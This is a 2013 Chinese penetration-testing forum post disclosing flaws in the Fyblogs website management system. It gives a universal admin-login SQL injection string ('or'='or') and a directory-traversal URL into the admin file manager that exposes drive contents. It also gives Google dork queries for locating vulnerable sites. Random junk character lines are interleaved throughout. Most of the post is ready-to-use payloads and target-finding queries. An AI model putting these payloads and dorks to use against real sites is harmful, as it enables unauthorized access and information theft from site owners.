中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
1 e3 t( ]! K2 z* p4 H
0 j; L, M: Z$ L9 Y) n
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 }# r' Y' u. c p8 F4 m. n
admin/uploadfile.asp?currentFolder=/upfiles/../
* K6 J3 J& n$ j: U' e2 H5 g
8 o: H, ?/ e3 \3 o5 C3 A5 G/ m" y
漏洞证明:
5 X2 Z9 m# {* w& s( E7 E
3 ^1 K: C$ `6 ]$ j8 F
谷歌:inurl:type.asp?id=1 新闻中心
4 l& ~/ x/ [: ^5 }8 B6 _) D
或者 :inurl:download_ok.asp?
4 \1 E+ C2 Q- b8 q2 ]3 B3 O
3 m& G; [! b& _/ Q4 B% I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2